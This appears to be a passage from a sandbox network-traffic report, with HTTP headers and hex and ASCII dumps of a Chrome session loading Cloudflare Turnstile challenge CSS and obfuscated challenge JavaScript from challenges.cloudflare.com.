                                                                                                                                                2024-10-28 16:47:58 UTC1369INData Raw: 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 66 69 6c 6c 3a 23 30
                                                                                                                                                Data Ascii: troke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;stroke-miterlimit:10;stroke:#038127;fill:#0
                                                                                                                                                2024-10-28 16:47:58 UTC1369INData Raw: 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f
                                                                                                                                                Data Ascii: nge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dark #challenge-o
                                                                                                                                                2024-10-28 16:47:58 UTC1369INData Raw: 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e
                                                                                                                                                Data Ascii: .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-helper-loop-lin
                                                                                                                                                2024-10-28 16:47:58 UTC1369INData Raw: 66 73 65 74 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 3b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 61 6e 69 6d 61 74 69 6f 6e 3a 73 74 72 6f 6b 65 20 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 66 61 69 6c 75 72 65 2d 63 72 6f 73 73 7b 66 69 6c 6c 3a 23 66 66 66 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 62 6f 74 74 6f 6d 20 63 65 6e 74 65 72 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 2d 69 6e 2e 61 6e 69 6d 61 74 69 6f 6e 7b 30 25 7b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 7d 74 6f 7b 66 69 6c 6c 3a 23 66
                                                                                                                                                Data Ascii: fset:166;stroke-width:2;stroke-miterlimit:10;stroke:#de1303;fill:#de1303;animation:stroke .6s cubic-bezier(.65,0,.45,1) forwards}.failure-cross{fill:#fff;transform-origin:bottom center}@keyframes fade-in.animation{0%{fill:#de1303;stroke:#de1303}to{fill:#f
                                                                                                                                                2024-10-28 16:47:58 UTC1369INData Raw: 6c 6f 77 3a 63 6f 6c 75 6d 6e 20 6e 6f 77 72 61 70 3b 67 61 70 3a 30 3b 68 65 69 67 68 74 3a 31 34 30 70 78 3b 70 61 64 64 69 6e 67 3a 31 32 70 78 20 30 3b 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 6c 69 6e 6b 2d 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 33 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 6c 6f 67 6f 7b 68 65 69
                                                                                                                                                Data Ascii: low:column nowrap;gap:0;height:140px;padding:12px 0;place-content:space-between}.size-compact .link-spacer{margin-left:3px;margin-right:3px}.size-compact .cb-c{margin:0 12px;text-align:left}.size-compact .cb-container{margin:0 12px}.size-compact #logo{hei
                                                                                                                                                2024-10-28 16:47:58 UTC1369INData Raw: 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 2c 2e 72 74 6c 20 23 66 72 2d 6f 76 65 72 72 75 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 2c 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 61 6c 69 67 6e 2d 73 65 6c 66 3a 66 6c 65 78 2d 73 74 61 72 74 3b 6a 75 73 74 69 66
                                                                                                                                                Data Ascii: rtl #fr-helper,.rtl #fr-overrun{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px}.rtl #branding,.rtl.size-compact #branding{padding-left:0;padding-right:0;text-align:left}.rtl.size-compact #branding{align-self:flex-start;justif
                                                                                                                                                2024-10-28 16:47:58 UTC1369INData Raw: 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 2e 69 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 75 6e 73 70 75 6e 20 2e 63 69 72 63 6c 65 7b 61 6e 69 6d 61 74 69 6f 6e 3a 75 6e 73 70 69 6e 20 2e 37 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 33 70 78 3b 73 74 72 6f 6b 65 2d 6c 69
                                                                                                                                                Data Ascii: ext-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#challenge-error-title .i-wrapper{display:none}.unspun .circle{animation:unspin .7s cubic-bezier(.65,0,.45,1) forwards}.circle{stroke-width:3px;stroke-li


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                39192.168.2.1649769104.18.94.414436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-10-28 16:47:59 UTC730OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8d9c69278df22e27&lang=auto HTTP/1.1
                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                Connection: keep-alive
                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                Accept: */*
                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/inwdh/0x4AAAAAAAjGd7wY-0w5WfUZ/auto/fbE/normal/auto/
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                2024-10-28 16:47:59 UTC331INHTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 28 Oct 2024 16:47:59 GMT
                                                                                                                                                Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                Content-Length: 128362
                                                                                                                                                Connection: close
                                                                                                                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8d9c692d2f480bca-DFW
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                2024-10-28 16:47:59 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 76 45 73 72 32 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46
                                                                                                                                                Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.vEsr2={"metadata":{"challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support","challenge.terms":"https%3A%2F
                                                                                                                                                2024-10-28 16:47:59 UTC1369INData Raw: 6f 72 25 32 30 69 66 25 32 30 74 68 69 73 25 32 30 70 72 6f 62 6c 65 6d 25 32 30 70 65 72 73 69 73 74 73 2e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 61 69 6c 75 72 65 22 3a 22 45 72 72 6f 72 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 65 78 70 69 72 65 64 22 3a 22 45 78 70 69 72 65 64 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 6f 6f 74 65 72 5f 70 72 69 76 61 63 79 22 3a 22 50 72 69 76 61 63 79 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 72 65 66 72 65 73 68 22 3a 22 52 65 66 72 65 73 68 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 73 75 63 63 65 73 73 22 3a 22 53 75 63 63 65 73 73 25 32 31 22 2c 22 69 6e 76 61 6c 69 64 5f 73 69 74 65 6b 65 79 22 3a 22 49 6e 76 61 6c 69 64 25 32 30 73 69 74 65 6b 65 79 2e 25 32 30 43 6f 6e 74 61 63 74 25 32 30 74 68 65 25 32 30 53 69 74
                                                                                                                                                Data Ascii: or%20if%20this%20problem%20persists.","turnstile_failure":"Error","turnstile_expired":"Expired","turnstile_footer_privacy":"Privacy","turnstile_refresh":"Refresh","turnstile_success":"Success%21","invalid_sitekey":"Invalid%20sitekey.%20Contact%20the%20Sit
                                                                                                                                                2024-10-28 16:47:59 UTC1369INData Raw: 38 31 29 29 2f 36 2b 70 61 72 73 65 49 6e 74 28 67 4b 28 31 35 30 30 29 29 2f 37 2a 28 70 61 72 73 65 49 6e 74 28 67 4b 28 38 34 39 29 29 2f 38 29 2b 70 61 72 73 65 49 6e 74 28 67 4b 28 31 32 39 34 29 29 2f 39 2b 70 61 72 73 65 49 6e 74 28 67 4b 28 31 33 30 38 29 29 2f 31 30 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 4b 28 39 38 31 29 29 2f 31 31 29 2c 64 3d 3d 3d 66 29 62 72 65 61 6b 3b 65 6c 73 65 20 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 63 61 74 63 68 28 67 29 7b 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 7d 28 61 2c 37 30 31 35 31 38 29 2c 65 4d 3d 74 68 69 73 7c 7c 73 65 6c 66 2c 65 4e 3d 65 4d 5b 67 4c 28 38 30 34 29 5d 2c 65 4d 5b 67 4c 28 37 36 30 29 5d 3d 21 5b 5d 2c 65 4d 5b 67 4c 28 38 31 32 29 5d 3d 66 75 6e 63 74 69 6f
                                                                                                                                                Data Ascii: 81))/6+parseInt(gK(1500))/7*(parseInt(gK(849))/8)+parseInt(gK(1294))/9+parseInt(gK(1308))/10*(-parseInt(gK(981))/11),d===f)break;else e.push(e.shift())}catch(g){e.push(e.shift())}}(a,701518),eM=this||self,eN=eM[gL(804)],eM[gL(760)]=![],eM[gL(812)]=functio
                                                                                                                                                2024-10-28 16:47:59 UTC1369INData Raw: 29 5d 5b 68 51 28 31 36 33 34 29 5d 26 26 28 78 3d 78 5b 68 51 28 36 37 31 29 5d 28 67 5b 68 51 28 32 33 32 29 5d 5b 68 51 28 31 36 33 34 29 5d 28 68 29 29 29 2c 78 3d 67 5b 68 51 28 38 39 39 29 5d 5b 68 51 28 31 30 33 35 29 5d 26 26 67 5b 68 51 28 31 34 30 39 29 5d 3f 67 5b 68 51 28 38 39 39 29 5d 5b 68 51 28 31 30 33 35 29 5d 28 6e 65 77 20 67 5b 28 68 51 28 31 34 30 39 29 29 5d 28 78 29 29 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 68 53 2c 4a 2c 48 29 7b 69 66 28 68 53 3d 68 51 2c 68 53 28 37 38 35 29 3d 3d 3d 68 53 28 32 32 38 29 29 4a 3d 7b 7d 2c 4a 5b 68 53 28 31 35 30 31 29 5d 3d 68 53 28 32 38 31 29 2c 4a 5b 68 53 28 31 35 34 35 29 5d 3d 4a 5b 68 53 28 31 38 38 29 5d 5b 68 53 28 31 35 39 35 29 5d 2c 4a 5b 68 53 28 34 30 38 29 5d 3d 6a 5b 68 53 28 31 38
                                                                                                                                                Data Ascii: )][hQ(1634)]&&(x=x[hQ(671)](g[hQ(232)][hQ(1634)](h))),x=g[hQ(899)][hQ(1035)]&&g[hQ(1409)]?g[hQ(899)][hQ(1035)](new g[(hQ(1409))](x)):function(G,hS,J,H){if(hS=hQ,hS(785)===hS(228))J={},J[hS(1501)]=hS(281),J[hS(1545)]=J[hS(188)][hS(1595)],J[hS(408)]=j[hS(18
                                                                                                                                                2024-10-28 16:47:59 UTC1369INData Raw: 67 5d 5b 30 5d 2b 2b 29 2c 31 33 36 29 2b 32 35 36 2c 32 35 35 29 5e 31 39 32 2e 31 39 2c 74 68 69 73 2e 68 5b 48 5e 74 68 69 73 2e 67 5d 3d 6a 5b 68 51 28 39 32 36 29 5d 28 74 68 69 73 2c 49 29 29 3a 6f 5b 68 51 28 31 31 34 30 29 5d 28 73 2c 69 2b 44 2c 45 29 2c 43 2b 2b 29 3b 72 65 74 75 72 6e 20 6a 3b 66 75 6e 63 74 69 6f 6e 20 73 28 47 2c 48 2c 68 52 2c 49 29 7b 69 66 28 68 52 3d 68 51 2c 49 3d 7b 27 70 73 54 43 70 27 3a 66 75 6e 63 74 69 6f 6e 28 4a 29 7b 72 65 74 75 72 6e 20 4a 28 29 7d 2c 27 61 6c 6a 74 75 27 3a 6f 5b 68 52 28 36 35 31 29 5d 7d 2c 6f 5b 68 52 28 31 33 33 31 29 5d 28 68 52 28 31 31 32 33 29 2c 6f 5b 68 52 28 35 37 33 29 5d 29 29 4f 62 6a 65 63 74 5b 68 52 28 31 32 37 37 29 5d 5b 68 52 28 35 39 33 29 5d 5b 68 52 28 32 34 30 29 5d 28
                                                                                                                                                Data Ascii: g][0]++),136)+256,255)^192.19,this.h[H^this.g]=j[hQ(926)](this,I)):o[hQ(1140)](s,i+D,E),C++);return j;function s(G,H,hR,I){if(hR=hQ,I={'psTCp':function(J){return J()},'aljtu':o[hR(651)]},o[hR(1331)](hR(1123),o[hR(573)]))Object[hR(1277)][hR(593)][hR(240)](
                                                                                                                                                2024-10-28 16:47:59 UTC1369INData Raw: 2c 27 43 43 76 74 47 27 3a 69 64 28 31 38 33 29 7d 29 3b 74 72 79 7b 69 66 28 65 5b 69 64 28 34 36 35 29 5d 28 69 64 28 33 31 32 29 2c 69 64 28 31 33 30 39 29 29 29 68 3d 65 5b 69 64 28 31 32 31 30 29 5d 28 67 2c 68 29 2c 74 79 70 65 6f 66 20 68 3d 3d 3d 65 5b 69 64 28 31 36 35 38 29 5d 26 26 68 28 6b 2c 6c 29 3b 65 6c 73 65 20 72 65 74 75 72 6e 20 66 41 28 63 29 7d 63 61 74 63 68 28 68 29 7b 69 66 28 65 5b 69 64 28 38 30 37 29 5d 3d 3d 3d 65 5b 69 64 28 38 30 37 29 5d 29 72 65 74 75 72 6e 20 65 5b 69 64 28 31 32 31 30 29 5d 28 66 79 2c 66 7a 28 63 29 29 3b 65 6c 73 65 20 6a 3d 65 5b 69 64 28 36 30 33 29 5d 28 65 5b 69 64 28 36 30 33 29 5d 28 74 68 69 73 2e 68 5b 74 68 69 73 2e 67 5e 32 33 31 5d 5b 33 5d 2c 31 32 30 2b 74 68 69 73 2e 68 5b 74 68 69 73 2e
                                                                                                                                                Data Ascii: ,'CCvtG':id(183)});try{if(e[id(465)](id(312),id(1309)))h=e[id(1210)](g,h),typeof h===e[id(1658)]&&h(k,l);else return fA(c)}catch(h){if(e[id(807)]===e[id(807)])return e[id(1210)](fy,fz(c));else j=e[id(603)](e[id(603)](this.h[this.g^231][3],120+this.h[this.
                                                                                                                                                2024-10-28 16:47:59 UTC1369INData Raw: 7b 72 65 74 75 72 6e 20 67 2b 68 7d 2c 27 64 58 6f 62 4d 27 3a 66 75 6e 63 74 69 6f 6e 28 67 2c 68 29 7b 72 65 74 75 72 6e 20 67 26 68 7d 2c 27 58 42 45 42 4d 27 3a 66 75 6e 63 74 69 6f 6e 28 67 2c 68 29 7b 72 65 74 75 72 6e 20 67 2b 68 7d 2c 27 64 6e 64 78 75 27 3a 66 75 6e 63 74 69 6f 6e 28 67 2c 68 2c 69 6a 29 7b 72 65 74 75 72 6e 20 69 6a 3d 62 2c 63 5b 69 6a 28 31 36 38 32 29 5d 28 67 2c 68 29 7d 2c 27 57 77 43 53 59 27 3a 66 75 6e 63 74 69 6f 6e 28 67 2c 68 2c 69 6b 29 7b 72 65 74 75 72 6e 20 69 6b 3d 62 2c 63 5b 69 6b 28 31 36 38 32 29 5d 28 67 2c 68 29 7d 2c 27 66 53 57 62 4a 27 3a 66 75 6e 63 74 69 6f 6e 28 67 2c 68 29 7b 72 65 74 75 72 6e 20 67 5e 68 7d 2c 27 41 56 49 50 4a 27 3a 69 6c 28 31 36 35 31 29 7d 2c 69 6c 28 31 35 39 33 29 3d 3d 3d 63
                                                                                                                                                Data Ascii: {return g+h},'dXobM':function(g,h){return g&h},'XBEBM':function(g,h){return g+h},'dndxu':function(g,h,ij){return ij=b,c[ij(1682)](g,h)},'WwCSY':function(g,h,ik){return ik=b,c[ik(1682)](g,h)},'fSWbJ':function(g,h){return g^h},'AVIPJ':il(1651)},il(1593)===c
                                                                                                                                                2024-10-28 16:47:59 UTC1369INData Raw: 28 73 29 2c 76 5b 69 6c 28 31 34 34 38 29 5d 5b 69 6c 28 31 32 32 35 29 5d 28 63 5b 69 6c 28 37 38 37 29 5d 28 78 2c 69 6c 28 32 35 35 29 29 29 2c 42 5b 69 6c 28 31 31 39 36 29 5d 28 66 75 6e 63 74 69 6f 6e 28 69 6d 2c 61 30 29 7b 28 69 6d 3d 69 6c 2c 4c 5b 69 6d 28 31 34 34 38 29 5d 5b 69 6d 28 31 39 30 29 5d 28 29 2c 4d 5b 69 6d 28 31 34 34 38 29 5d 5b 69 6d 28 31 33 37 30 29 5d 28 29 2c 4e 5b 69 6d 28 35 38 34 29 5d 3d 21 21 5b 5d 2c 4f 5b 69 6d 28 38 36 39 29 5d 29 26 26 28 61 30 3d 7b 7d 2c 61 30 5b 69 6d 28 31 35 30 31 29 5d 3d 69 6d 28 32 38 31 29 2c 61 30 5b 69 6d 28 31 35 34 35 29 5d 3d 56 5b 69 6d 28 31 38 38 29 5d 5b 69 6d 28 31 35 39 35 29 5d 2c 61 30 5b 69 6d 28 34 30 38 29 5d 3d 57 5b 69 6d 28 31 38 38 29 5d 5b 69 6d 28 36 37 35 29 5d 2c 61
                                                                                                                                                Data Ascii: (s),v[il(1448)][il(1225)](c[il(787)](x,il(255))),B[il(1196)](function(im,a0){(im=il,L[im(1448)][im(190)](),M[im(1448)][im(1370)](),N[im(584)]=!![],O[im(869)])&&(a0={},a0[im(1501)]=im(281),a0[im(1545)]=V[im(188)][im(1595)],a0[im(408)]=W[im(188)][im(675)],a
                                                                                                                                                2024-10-28 16:47:59 UTC1369INData Raw: 20 65 4d 5b 28 69 6f 28 34 39 35 29 29 5d 28 29 2c 21 42 29 72 65 74 75 72 6e 3b 43 3d 6b 5b 69 6f 28 31 30 38 30 29 5d 2c 42 5b 69 6f 28 31 35 30 33 29 5d 28 43 2c 6f 2c 21 21 5b 5d 29 2c 42 5b 69 6f 28 38 33 31 29 5d 3d 32 35 30 30 2c 42 5b 69 6f 28 31 36 30 31 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 42 5b 69 6f 28 31 34 36 32 29 5d 28 69 6f 28 33 33 32 29 2c 69 6f 28 31 34 34 33 29 29 2c 44 3d 7b 7d 2c 44 5b 69 6f 28 35 34 32 29 5d 3d 67 2c 44 5b 69 6f 28 38 33 39 29 5d 3d 6c 2c 44 2e 63 63 3d 68 2c 44 5b 69 6f 28 31 35 30 31 29 5d 3d 6d 2c 44 5b 69 6f 28 31 30 38 34 29 5d 3d 78 2c 45 3d 4a 53 4f 4e 5b 69 6f 28 35 31 30 29 5d 28 44 29 2c 46 3d 67 4a 5b 69 6f 28 31 35 35 35 29 5d 28 45 29 5b 69 6f 28 34 37 34 29 5d 28 27 2b 27 2c 69 6f 28 31 35
                                                                                                                                                Data Ascii: eM[(io(495))](),!B)return;C=k[io(1080)],B[io(1503)](C,o,!![]),B[io(831)]=2500,B[io(1601)]=function(){},B[io(1462)](io(332),io(1443)),D={},D[io(542)]=g,D[io(839)]=l,D.cc=h,D[io(1501)]=m,D[io(1084)]=x,E=JSON[io(510)](D),F=gJ[io(1555)](E)[io(474)]('+',io(15
                                                                                                                                                2024-10-28 16:47:59 UTC1369INData Raw: 69 70 28 34 36 38 29 5d 3d 67 2c 6d 5b 69 70 28 31 32 38 32 29 5d 3d 68 2c 6d 5b 69 70 28 34 39 38 29 5d 3d 69 2c 6d 5b 69 70 28 33 38 34 29 5d 3d 64 2c 6d 7d 2c 65 4d 5b 67 4c 28 31 36 30 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 66 2c 67 2c 68 2c 69 2c 69 72 2c 6a 2c 6b 2c 6c 2c 6d 2c 6e 2c 6f 29 7b 28 69 72 3d 67 4c 2c 6a 3d 7b 7d 2c 6a 5b 69 72 28 36 38 30 29 5d 3d 69 72 28 34 32 35 29 2c 6a 5b 69 72 28 35 37 35 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 73 2c 76 29 7b 72 65 74 75 72 6e 20 73 3e 76 7d 2c 6b 3d 6a 2c 6c 3d 65 5b 69 72 28 31 31 31 37 29 5d 28 29 2c 6d 3d 69 72 28 33 37 36 29 2c 6b 5b 69 72 28 35 37 35 29 5d 28 6c 5b 69 72 28 34 36 30 29 5d 28 6d 29 2c 2d 31 29 29 3f 65 4d 5b 69 72 28 31 31 39 36 29 5d 28 66 75 6e 63 74 69 6f 6e 28 69 73 29 7b
                                                                                                                                                Data Ascii: ip(468)]=g,m[ip(1282)]=h,m[ip(498)]=i,m[ip(384)]=d,m},eM[gL(160)]=function(e,f,g,h,i,ir,j,k,l,m,n,o){(ir=gL,j={},j[ir(680)]=ir(425),j[ir(575)]=function(s,v){return s>v},k=j,l=e[ir(1117)](),m=ir(376),k[ir(575)](l[ir(460)](m),-1))?eM[ir(1196)](function(is){


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                40192.168.2.1649770104.18.95.414436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-10-28 16:48:01 UTC433OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8d9c69278df22e27&lang=auto HTTP/1.1
                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                Connection: keep-alive
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                Accept: */*
                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                2024-10-28 16:48:01 UTC331INHTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 28 Oct 2024 16:48:01 GMT
                                                                                                                                                Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                Content-Length: 118286
